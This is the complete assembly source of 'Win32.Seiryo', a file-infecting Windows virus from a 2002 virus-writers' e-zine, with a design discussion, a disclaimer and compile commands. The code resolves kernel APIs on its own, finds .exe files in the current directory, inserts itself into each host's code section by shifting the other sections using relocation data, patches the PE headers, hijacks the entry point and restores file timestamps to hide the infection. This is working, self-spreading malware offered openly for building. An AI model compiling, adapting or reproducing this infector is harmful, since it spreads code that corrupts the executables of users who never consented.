COMMENT ` ---------------------------------------------------------------- )=- -=( Natural Selection Issue #1 ------------------------------ Win32.Seiryo )=- -=( ---------------------------------------------------------------------- )=- -=( 0 : Win32.Seiryo Features -------------------------------------------- )=- Imports: Locates the Kernel, does it's own imports Infects: PE files containing .reloc section by expanding the host's CODE section and putting itself in it (and not setting the write bit) Locates: Files in current directory Compatibility: All tested windows versions Saves Stamps: Yes MultiThreaded: No Polymorphism: None AntiAV / EPO: None SEH Abilities: None Payload: None -=( 1 : Win32.Seiryo Design Goals ---------------------------------------- )=- The purpose of this virus was to test a relatively new method of allocating space for a virus. Traditionally, the virus is simply appended to the end of the file as either a separate section or tacked onto the last section. This has the problem that usually the entry point to the file is now not the code section, and inevitably program execution leaves the code section. This idea was derived from Zombie's Zmist - that is to use the .reloc section. This virus looks for a file with a reloc section, memory maps it, and proceeds to expand the code section to fit the virus. It then copies itself into this space. All the other sections are moved back to make space for the virus, the code section is updated to reflect these changes (thanks to reloc telling you where the data is), and then the entire PE header must be updated. So, how well does this method work? Here's a breakdown of what must be done and it's complexity: : Calculating the move amounts/new addresses is straight forward. : Using .reloc to update the .text is surprisingly easy But: : Fixing up EVERY RVA/VA in the PE header is a nightmare, especially with the documentation on the more obscure parts of it being hard to come by. The main stuff that NEEDS to be fixed is: : PE Header (SizeOfImage, etc) : Data Directory : Section Table : Import Tables (HNA, and first thunk too) : .reloc section : Resource Section (else icons disappear - may as well write a prepending virus if you don't) : Export Section (and all that goes with that) : Debug Entries (optional - just zero it) : There are about 5-8 more thing, but they are never used and good documentation on them is scarce So, how well does it work? It works ok. Well, coding it is lots of work, and the debugging highly unpleasant. Reconstructed files are surprisingly stable providing that the code is correctly debugged. It could well become the preferred method of infection in terms of stealth. The lengthy code, potential bugs, and complexity could be a deterrence for use in an average virus. -=( 2 : Win32.Seiryo Design Faults --------------------------------------- )=- This is a test virus, so the it's spreading ability is minimal. The major drawback to this infection method is that not all files have .reloc sections. In fact, only about half of non-system files, maybe less have one. Thus this method should probably have a backup method of space allocation. -=( 3 : Win32.Seiryo Disclaimer ------------------------------------------ )=- THE CONTENTS OF THIS ELECTRONIC MAGAZINE AND ITS ASSOCIATED SOURCE CODE ARE COVERED UNDER THE BELOW TERMS AND CONDITIONS. IF YOU DO NOT AGREE TO BE BOUND BY THESE TERMS AND CONDITIONS, OR ARE NOT LEGALLY ENTITLED TO AGREE TO THEM, YOU MUST DISCONTINUE USE OF THIS MAGAZINE IMMEDIATELY. COPYRIGHT Copyright on materials in this magazine and the information therein and their arrangement is owned by FEATHERED SERPENTS unless otherwise indicated. RIGHTS AND LIMITATIONS You have the right to use, copy and distribute the material in this magazine free of charge, for all purposes allowed by your governing laws. You are expressly PROHIBITED from using the material contained herein for any purposes that would cause or would help promote the illegal use of the material. NO WARRANTY The information contained within this magazine are provided "as is". FEATHERED SERPENTS do not warranty the accuracy, adequacy, or completeness of given information, and expressly disclaims liability for errors or omissions contained therein. No implied, express, or statutory warranty, is given in conjunction with this magazine. LIMITATION OF LIABILITY In *NO* event will FEATHERED SERPENTS or any of its MEMBERS be liable for any damages including and without limitation, direct or indirect, special, incidental, or consequential damages, losses, or expenses arising in connection with this magazine, or the use thereof. ADDITIONAL DISCLAIMER Computer viruses will spread of their own accord between computer systems, and across international boundaries. They are raw animals with no concern for the law, and for that reason your possession of them makes YOU responsible for the actions they carry out. The viruses provided in this magazine are for educational purposes ONLY. They are NOT intended for use in ANY WAY outside of strict, controlled laboratory conditions. If compiled and executed these viruses WILL land you in court(s). You will be held responsible for your actions. As source code these viruses are inert and covered by implied freedom of speech laws in some countries. In binary form these viruses are malicious weapons. FEATHERED SERPENTS do not condone the application of these viruses and will NOT be held LIABLE for any MISUSE. -=( 4 : Win32.Seiryo Compile Instructions -------------------------------- )=- TASM32 5.0 & TLINK32 tasm32 /m /ml Seiryo.asm tlink32 /Tpe /x Seiryo.obj, Seiryo.exe,,import32.lib -=( 5 : Win32.Seiryo ----------------------------------------------------- ) ` %out Assembling file implies acceptance of disclaimer inside source code .386 .model flat, stdcall warn ; Warnings on VIRSIZE equ VirEnd - VirStart extrn ExitProcess:PROC INVALID_HANDLE_VALUE equ 0FFFFFFFFh OPEN_EXISTING equ 3 FILE_SHARE_WRITE equ 0002h FILE_BEGIN equ 0 FILE_MAP_WRITE equ 2 GENERIC_READ equ 80000000h GENERIC_WRITE equ 40000000h PAGE_READWRITE equ 00000004h WIN32_FIND_DATA struct fd_dwFileAttributes dd 0 fd_ftCreationTime dd 0, 0 fd_ftLastAccessTime dd 0, 0 fd_ftLastWriteTime dd 0, 0 fd_nFileSizeHigh dd 0 fd_nFileSizeLow dd 0 fd_dwReserved0 dd 0 fd_dwReserved1 dd 0 fd_cFileName db 260 dup(0) fd_cAlternateFileName db 14 dup(0) WIN32_FIND_DATA ends PEHEADER struct ID dd ? Machine dw ? NumberOfSections dw ? TimeDateStamp dd ? PointerToSymbolTable dd ? NumberOfSymbols dd ? SizeOfOptionalHeader dw ? Characteristics dw ? ; Optional Header: MagicNumber dw ? MajorLinkerVersion db ? MinorLinkerVersion db ? SizeOfCode dd ? SizeOfInitializedData dd ? SizeOfUninitializedData dd ? AddressOfEntryPoint dd ? BaseOfCode dd ? BaseOfData dd ? ImageBase dd ? SectionAlignment dd ? FileAlignment dd ? MajorOperatingSystemVersion dw ? MinorOperatingSystemVersion dw ? MajorImageVersion dw ? MinorImageVersion dw ? MajorSubsystemVersion dw ? MinorSubsystemVersion dw ? Reserved1 dd ? SizeOfImage dd ? SizeOfHeaders dd ? CheckSum dd ? Subsystem dw ? DllCharacteristics dw ? SizeOfStackReserve dd ? SizeOfStackCommit dd ? SizeOfHeapReserve dd ? SizeOfHeapCommit dd ? LoaderFlags dd ? NumberOfRvaAndSizes dd ? DataDirectory dd 20 dup (?) PEHEADER ends ; -**************************- ; Section Table Entry format ; -**************************- SECTION struct sec_Name db 8 dup (?) sec_VirtualSize dd ? sec_VirtualAddress dd ? sec_SizeOfRawData dd ? sec_PointerToRawData dd ? sec_PointerToRelocations dd ? sec_PointerToLinenumbers dd ? sec_NumberOfRelocations dw ? sec_NumberOfLineNumbers dw ? sec_Characteristics dd ? SECTION ends ; Section Characteristics flags ; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC_CODE equ 00000020h SEC_INITIALIZED_DATA equ 00000040h SEC_UNINITIALIZED_DATA equ 00000080h SEC_NO_CACHE equ 04000000h SEC_NOT_PAGEABLE equ 08000000h SEC_SHARED equ 10000000h SEC_EXECUTABLE equ 20000000h SEC_READ equ 40000000h SEC_WRITE equ 80000000h ; -*******************- ; Import Table format ; -*******************- IMPORTTABLE struct imp_Characteristics dd ? imp_DateTimeStamp dd ? imp_ForwarderChain dd ? imp_Name dd ? imp_FirstThunk dd ? IMPORTTABLE ends ; -*******************- ; Export Table format ; -*******************- EXPORTHEADER struct exp_Characteristics dd ? exp_DateTimeStamp dd ? exp_MajorVersion dw ? exp_MinorVersion dw ? exp_Name dd ? exp_Base dd ? exp_NumberOfFunctions dd ? exp_NumberOfNames dd ? exp_AddressOfFunctions dd ? exp_AddressOfNames dd ? exp_AddressOfNameOrdinals dd ? EXPORTHEADER ends ; -******************- ; Resource Dir Table ; -******************- RESOURCETABLE struct res_Characteristics dd ? res_DateTimeStamp dd ? res_MajorVersion dw ? res_MinorVersion dw ? res_NumNameEntry dw ? res_NumIDEntry dw ? RESOURCETABLE ends RESOURCEENTRY struct resent_ID dd ? resent_Next dd ? RESOURCEENTRY ends ; -****************- ; Thread Dir Table ; -****************- THREADTABLE struct thread_StartDataVA dd ? thread_EndDataVA dd ? thread_IndexVA dd ? thread_CallbackTableVA dd ? THREADTABLE ends .DATA dummy db 0 ; ******* ; Local Variables ; ******* AlignPhys equ -3 AlignVirtual equ -4 VirusRVA equ AlignVirtual-4 VirusVA equ VirusRVA-4 MoveAmount equ VirusVA-4 PhysMove equ MoveAmount-4 _FindFirstFileA equ PhysMove-4 _CreateFileA equ _FindFirstFileA-4 _CreateFileMappingA equ _CreateFileA-4 _MapViewOfFile equ _CreateFileMappingA-4 _UnmapViewOfFile equ _MapViewOfFile-4 _SetFilePointer equ _UnmapViewOfFile-4 _SetEndOfFile equ _SetFilePointer-4 _SetFileTime equ _SetEndOfFile-4 _CloseHandle equ _SetFileTime-4 _FindNextFileA equ _CloseHandle-4 Imports equ _FindNextFileA ; Label (no -4) FileFind equ Imports-size WIN32_FIND_DATA FileFindHnd equ FileFind-4 SizeOfLocals equ -FileFindHnd .CODE VirStart: start: push ebp ; Setup locals on stack mov ebp, esp sub esp, SizeOfLocals mov edi, [ebp+4] and edi, 0FFFFf000h mov ecx, 128 FindKernelLoop: cmp word ptr [edi], 'ZM' je short GotKernel sub edi, 1000h loop FindKernelLoop GotoExitInfector: jmp ExitInfector GotKernel: movzx edx, word ptr [edi+3Ch] add edx, edi cmp dword ptr [edx], 'EP' jne short GotoExitInfector mov edx, [edx].DataDirectory ; Get Kernel Exports add edx, edi xor ecx, ecx mov esi, [edx].exp_AddressOfNames add esi, edi FindGetProc: inc ecx cmp ecx, [edx].exp_NumberOfNames jg short GotoExitInfector lodsd add eax, edi cmp [eax], 'PteG' jne short FindGetProc cmp [eax+4], 'Acor' jne short FindGetProc cmp [eax+8], 'erdd' jne short FindGetProc mov ebx, [edx].exp_AddressOfNameOrdinals add ebx, edi movzx ecx, word ptr [ebx+2*ecx] sub ecx, [edx].exp_Base mov ebx, [edx].exp_AddressOfFunctions add ebx, edi mov edx, [ebx+4*ecx] add edx, edi call PushImportsAddress db 14,'FindNextFileA',0 db 12,'CloseHandle',0 db 12,'SetFileTime',0 db 13,'SetEndOfFile',0 db 15,'SetFilePointer',0 db 16,'UnmapViewOfFile',0 db 14,'MapViewOfFile',0 db 19,'CreateFileMappingA',0 db 12,'CreateFileA',0 db 15,'FindFirstFileA',0 db 0 PushImportsAddress: pop esi xor ecx, ecx mov ebx, edi lea edi, [ebp+Imports] ImportLoop: mov cl, [esi] inc esi jecxz DoneImports push edx push ecx call edx, ebx, esi or eax, eax jz ExitInfector pop ecx pop edx stosd add esi, ecx jmp short ImportLoop DoneImports: lea eax, [ebp+FileFind] ; Find an Exe file push eax call PushFileMask db '*.exe',0 PushFileMask: call [ebp+_FindFirstFileA] mov [ebp+FileFindHnd], eax cmp eax, INVALID_HANDLE_VALUE je ExitInfector InfectNextFile: lea eax, [ebp+FileFind].fd_cFileName ; Get FileName cmp byte ptr [eax], 0 ; use short if no long jne short UseLongFileName lea eax, [ebp+FileFind].fd_cAlternateFileName UseLongFileName: call [ebp+_CreateFileA], eax, GENERIC_READ+GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0 cmp eax, INVALID_HANDLE_VALUE ; Map the file je FindTheNextFile push eax ; Push FileHandle for close mov ebx, [ebp+FileFind].fd_nFileSizeLow add ebx, VIRSIZE+10000 call [ebp+_CreateFileMappingA], eax, 0, PAGE_READWRITE, 0, ebx, 0 or eax, eax je CloseAndExitInfector push eax xchg eax, esi call [ebp+_MapViewOfFile], esi, FILE_MAP_WRITE, 0, 0, 0 push eax ; Push Memory Addy for close mov esi, eax cmp word ptr [eax], 'ZM' ; Check if exe is ok to infect jne InfectableNo cmp word ptr [eax+18h], 40h jb InfectableNo movzx ecx, word ptr [eax+3Ch] add eax, ecx cmp dword ptr [eax], 'EP' jne InfectableNo cmp [eax].NumberOfRvaAndSizes, 10 jb InfectableNo cmp [eax].MinorLinkerVersion, 7 ; Infection Marker je InfectableNo movzx edx, [eax].SizeOfOptionalHeader lea edx, [eax+edx+18h] ; Start of Section table ; Check For code section being first test [edx].sec_Characteristics, SEC_CODE jz InfectableNo mov byte ptr [ebp+AlignVirtual],1 ; See if Virt aligned mov ebx, [edx].sec_VirtualSize mov ecx, [eax].SectionAlignment dec ecx test ebx, ecx jz short VirtuallyAligned dec byte ptr [ebp+AlignVirtual] VirtuallyAligned: mov byte ptr [ebp+AlignPhys],1 ; See if Phys aligned mov edi, [edx].sec_SizeOfRawData mov ecx, [eax].FileAlignment dec ecx test edi, ecx jz short PhysicallyAligned dec byte ptr [ebp+AlignPhys] PhysicallyAligned: cmp ebx, edi ; Which is smaller? jbe short UseVirtualSize ; (i.e. actual size) mov ebx, edi UseVirtualSize: mov edi, ebx ; Find Physical move amount add edi, [edx].sec_PointerToRawData lea edi, [edi+ecx+VIRSIZE] not ecx and edi, ecx mov [ebp+PhysMove], edi add ebx, [edx].sec_VirtualAddress ; Find VA & RVA of virus mov [ebp+VirusRVA], ebx mov edi, ebx add ebx, [eax].ImageBase mov [ebp+VirusVA], ebx movzx ecx, [eax].NumberOfSections ; Code Section First? mov ebx, [edx].sec_VirtualAddress push edx push ecx CheckForFirstSection: cmp ebx, [edx].sec_VirtualAddress ja InfectableNo add edx, size SECTION loop CheckForFirstSection pop ecx pop edx dec ecx ; Section 2 is Next? jz short DoneCheckNextSec mov ebx, [edx + size SECTION].sec_PointerToRawData sub [ebp+PhysMove], ebx mov ebx, [edx + size SECTION].sec_VirtualAddress cmp ebx, [eax].AddressOfEntryPoint ; Entry Point in code sec? jbe InfectableNo CheckNextSec: add edx, size SECTION cmp ebx, [edx].sec_VirtualAddress ja InfectableNo loop CheckNextSec DoneCheckNextSec: add edi, VIRSIZE ; Calculate Virtual Move amount mov ecx, [eax].SectionAlignment dec ecx add edi, ecx not ecx and edi, ecx sub edi, ebx jae short PositiveMoveAmount xor edi, edi PositiveMoveAmount: mov [ebp+MoveAmount], edi ; ************ ; Goto relocation section mov eax, [eax].DataDirectory+40 ; Reloc Offset or eax, eax jz InfectableNo call RVA2Addr mov edi, eax ; EDI = start of relocation info (struct: repeat of following). ; RELOC INFO is: ; RVA dd ? ; Size dd ? - includes the 8 bytes for this and above field. ; - should always be 32bit aligned. ; entries dw (Size-8)/2 dup (?) ; Rellocs end when next RVA is 0 ; Each entry's top 4 bits are the type of relocation. The rest of the 12 bits ; are an offset from the RVA of the position. ; (i.e. address = RVA + (entry & 0x0FFF) ) ; Currently handles only relocations of types 0 (nop) and 3 (normal) MoveRelocLoop: mov eax, [edi] or eax, eax ; If RVA=0 then done je short DoneReloc cmp eax, [ebp+VirusRVA] ; reloc it if < VirusRVA jb short MoveRelocSkip mov ecx, [ebp+MoveAmount] add [edi], ecx MoveRelocSkip: mov ecx, [edi+4] sub ecx, 8 shr ecx, 1 ; ecx = number of entries add edi, 8 call RVA2Addr mov edx, eax InnerRelocLoop: jecxz MoveRelocLoop ; Done block if ecx=0 - do next dec ecx movzx eax, word ptr [edi] inc edi inc edi mov ebx,eax shr ebx, 12 ; ebx = top 4 bits of entry jz short InnerRelocLoop ; if 0, then it's padding cmp ebx, 3 jne InfectableNo and ah,0Fh ; remove type mov ebx, [eax+edx] ; reloc if necessary cmp ebx, [ebp+VirusVA] jb short InnerRelocLoop mov ebx, [ebp+MoveAmount] add dword ptr [eax+edx], ebx jmp short InnerRelocLoop ;RelocError: ; int 3 ; int 3 DoneReloc: ; ************ ; Move physically ; ************ movzx edx, word ptr [esi+3Ch] ; From the new virus position add edx, esi ; move everything to EOF back mov eax,[ebp+VirusRVA] ; by PhysMove mov [ebp+VirusRVA], eax ; To do this, start at EOF dec eax ; and go backwards to start call RVA2Addr ; (hence std/rep movsb) inc eax mov ecx, esi add ecx, [ebp+FileFind].fd_nFileSizeLow sub ecx, eax xchg eax, ebx push esi lea esi, [ebx+ecx-1] mov eax, [ebp+PhysMove] add [ebp+FileFind].fd_nFileSizeLow, eax lea edi, [esi+eax] std rep movsb cld mov ecx, VIRSIZE ; Copy code into it mov edi, ebx call GetVirStart GetVirStart: pop esi sub esi, GetVirStart-VirStart rep movsb pop esi ; *********************** ; Fix RVAs and other ; *********************** ; PE Header Fix ; Entry Point - should be fine for now ; ImageSize mov eax, [ebp+MoveAmount] add [edx].SizeOfImage, eax ; SizeOfCode add [edx].SizeOfCode, eax ; BaseOfData add [edx].BaseOfData, eax ; DataDirectory: mov ecx, [edx].NumberOfRvaAndSizes lea edi, [edx].DataDirectory DataDirLoop: mov eax, [edi] or eax, eax jz short DataDirSkip cmp eax, [ebp+VirusRVA] jb short DataDirSkip add eax, [ebp+MoveAmount] mov [edi], eax DataDirSkip: add edi,8 loop DataDirLoop ; Fix Section Table (edi conviniently points to it now) mov eax, [ebp+VirusRVA] sub eax, [edi].sec_VirtualAddress add eax, VIRSIZE cmp byte ptr [ebp+AlignVirtual],1 jne short NoVirtAlign mov ecx, [edx].SectionAlignment dec ecx add eax, ecx not ecx and eax, ecx NoVirtAlign: mov [edi].sec_VirtualSize, eax mov eax, [edi].sec_SizeOfRawData add eax, [ebp+PhysMove] mov [edi].sec_SizeOfRawData, eax movzx ecx, [edx].NumberOfSections mov ebx, [ebp+PhysMove] SectionTableFixUp: mov eax, [edi].sec_VirtualAddress cmp eax, [ebp+VirusRVA] jb short NextSecFixUp add eax, [ebp+MoveAmount] mov [edi].sec_VirtualAddress, eax add [edi].sec_PointerToRawData,ebx NextSecFixUp: add edi, size SECTION loop SectionTableFixUp ; Fix Up Relocation Section - done above (during reloc) ; Fix up Imports movzx eax, word ptr [esi+3Ch] add eax, esi mov eax, [eax].DataDirectory+8 call RVA2Addr xchg eax, edi mov ebx, [ebp+MoveAmount] FixNextImport: mov eax, [edi].imp_Name or eax, eax je short DoneImportFix cmp eax, [ebp+VirusRVA] jb short SkipImpNameFix add [edi].imp_Name, ebx SkipImpNameFix: mov eax, [edi].imp_Characteristics or eax, eax jz short FixFirstThunk cmp eax, [ebp+VirusRVA] jb short SkipImpCharFix add eax, ebx mov [edi].imp_Characteristics, eax SkipImpCharFix: ; Fix Characteristic field now call RVA2Addr ImpCharLoop: mov ecx, [eax] or ecx, ecx jz short ImpCharLoopDone js short ImpCharLoopNoFix cmp ecx, [ebp+VirusRVA] jb short ImpCharLoopNoFix add [eax], ebx ImpCharLoopNoFix: add eax, 4 jmp short ImpCharLoop ImpCharLoopDone: FixFirstThunk: mov eax, [edi].imp_FirstThunk cmp eax, [ebp+VirusRVA] jb short DoneSectionFix add eax, ebx mov [edi].imp_FirstThunk, eax DoneSectionFix: call RVA2Addr ImpThunkLoop: mov ecx, [eax] or ecx, ecx jz short ImpThunkLoopDone js short ImpThunkNoFix cmp ecx, [ebp+VirusRVA] jb short ImpThunkNoFix add dword ptr [eax], ebx ImpThunkNoFix: add eax, 4 jmp short ImpThunkLoop ImpThunkLoopDone: add edi, size IMPORTTABLE jmp short FixNextImport DoneImportFix: ; Fix up Resource (2) mov eax, [edx].DataDirectory+(2*8) or eax, eax jz short FixUpNoResources call RVA2Addr push edx mov edx, eax xchg eax, edi mov ebx, [ebp+MoveAmount] call FixupResource pop edx FixUpNoResources: ;FixUpExports: mov eax, [edx].DataDirectory or eax, eax jz short FixUpNoExports call RVA2Addr push edx mov edx, [ebp+VirusRVA] xchg eax, edi add [edi].exp_Name, ebx ; Fix dll name add [edi].exp_AddressOfFunctions, ebx ; Fix RVA to address Array mov eax, [edi].exp_AddressOfFunctions call RVA2Addr mov ecx, [edi].exp_NumberOfFunctions ExpFixFuncRVAsLoop: ; Not handling ecx=0, who cares cmp [eax], edx jb short ExpFixFuncSkipRVA add [eax], ebx ExpFixFuncSkipRVA: add eax, 4 loop ExpFixFuncRVAsLoop add [edi].exp_AddressOfNames, ebx mov eax, [edi].exp_AddressOfNames call RVA2Addr mov ecx, [edi].exp_NumberOfNames ExpFixNameRVAsLoop: cmp [eax], edx jb short ExpFixNameSkipRVA add [eax], ebx ExpFixNameSkipRVA: add eax, 4 loop ExpFixNameRVAsLoop add [edi].exp_AddressOfNameOrdinals, ebx pop edx FixUpNoExports: xor eax, eax mov [edx].DataDirectory+(6*8), eax ; Kill debug info mov [edx].DataDirectory+(6*8+4), eax ; Kill debug info ; Fix Thread Storage ; - All are VAs - thus they seem to be fixed by fixing the reloc entries. ; (at least in my test files) ; ; mov eax, [edx].DataDirectory+(9*8) ; or eax, eax ; jz short NoThreadStorage ; call RVA2Addr ; xchg eax, edi ; ; mov eax, [edi].thread_StartDataVA ; cmp eax, [ebp+VirusVA] ; jb short ThreadNoFixStart ; add [edi].thread_StartDataVA, ebx ;ThreadNoFixStart: ; mov eax, [edi].thread_EndDataVA ; cmp eax, [ebp+VirusVA] ; jb short ThreadNoFixEnd ; add [edi].thread_StartDataVA, ebx ;ThreadNoFixEnd: ; mov eax, [edi].thread_IndexVA ; cmp eax, [ebp+VirusVA] ; jb short ThreadNoFixIndex ; add [edi].thread_IndexVA, ebx ;ThreadNoFixIndex: ; mov eax, [edi].thread_CallbackTableVA ; cmp eax, [ebp+VirusVA] ; jb short ThreadNoFixCallback ; add [edi].thread_CallbackTableVA, ebx ;ThreadNoFixCallback: ; sub eax, [edx].ImageBase ; call RVA2Addr NoThreadStorage: ; Fiddle with entry point mov [edx].MinorLinkerVersion, 7 mov ecx, [edx].AddressOfEntryPoint mov eax, [ebp+VirusRVA] mov [edx].AddressOfEntryPoint, eax ; Set new entry point add eax, offset HostFileEntryPoint - offset VirStart sub ecx, 4 sub ecx, eax call RVA2Addr mov [eax], ecx ; Fix Jump to host in mem map ; Checklist: ; --------- ; Fix up Exports (0) done ; Fix up Imports (1) done ; Fix up Resource (2) done ; Fix up Exception (3) ; Fix up Security (4) ; Fix up Reloc (5) done ; Fix up Debug (6) zeroed ; Fix up Description/Architecture (7) done? ; Fix up Machine Value (8) ; Fix up ThreadStorage (9) done by reloc fixup? ; Fix up LoadConfiuration (10) ; Fix up Bound Import (11) ; Fix up Import Address Table (12) done by imports fixup ; Fix up Delay Import (13) ; Fix up COM Runtime Descriptor (14) InfectableNo: UnmapAndClose: call [ebp+_UnmapViewOfFile] call [ebp+_CloseHandle] mov ebx, [esp] ; Reset File Size call [ebp+_SetFilePointer], ebx, [ebp+FileFind].fd_nFileSizeLow, 0, FILE_BEGIN call [ebp+_SetEndOfFile], ebx lea eax, [ebp+FileFind].fd_ftCreationTime lea ecx, [ebp+FileFind].fd_ftLastAccessTime lea edx, [ebp+FileFind].fd_ftLastWriteTime call [ebp+_SetFileTime], ebx, eax,ecx,edx CloseAndExitInfector: call [ebp+_CloseHandle] FindTheNextFile: lea eax, [ebp+FileFind] call [ebp+_FindNextFileA], dword ptr [ebp+FileFindHnd], eax or eax, eax jnz InfectNextFile ExitInfector: mov esp, ebp pop ebp db 0E9h ; jmp VirEnd (full displacement) HostFileEntryPoint: dd offset VirEnd - offset HostFileEntryPoint - 4 ; Fix up resource ; edi = base address of resource ; edx = current shit ; ebx = reloc amount FixupResource: push eax push ecx push edx movzx ecx, [edx].res_NumNameEntry movzx eax, [edx].res_NumIDEntry add ecx, eax add edx, size RESOURCETABLE FixResourceLoop: ; no need to mess with [edx].resent_ID ; it's either an 31-bit integer or the top bit is set and it's a ; relative displacement from the resource base address FixResourceIsID: mov eax, [edx].resent_Next or eax, eax js short FixResourceRecurse add [edi+eax], ebx ; Fix RVA jmp short FixResourceNext FixResourceRecurse: btc eax,31 ; kill top bit push edx ; save current position lea edx, [edi+eax] ; find pos of next res dir call FixupResource ; Recursively fix pop edx FixResourceNext: add edx, size RESOURCEENTRY loop FixResourceLoop pop edx pop ecx pop eax ret ; From RVA calculate Physical offset ; Enter ; eax = RVA ; esi = Start Of Memory mapped PE file. ; Leave: ; eax = Mem map Address RVA2Addr: push ebx push edx push ecx push esi push edi movzx edi, word ptr [esi+3Ch] add edi, esi movzx edx, [edi].SizeOfOptionalHeader movzx ecx, [edi].NumberOfSections lea edx, [edi+edx+18h] ; Start of Section table mov ebx, [edx].sec_VirtualAddress mov esi, [edx].sec_PointerToRawData SectionLoop1: cmp ebx, [edx].sec_VirtualAddress jae short SkipSecLoop1 cmp eax, [edx].sec_VirtualAddress jb short SkipSecLoop1 mov ebx, [edx].sec_VirtualAddress mov esi, [edx].sec_PointerToRawData SkipSecLoop1: add edx, size SECTION loop SectionLoop1 sub eax, ebx add eax, esi pop edi pop esi add eax, esi pop ecx pop edx pop ebx ret VirEnd: call ExitProcess, 0 end start COMMENT ` ---------------------------------------------------------------- )=- -=( Natural Selection Issue #1 --------------- (c) 2002 Feathered Serpents )=- -=( ---------------------------------------------------------------------- ) `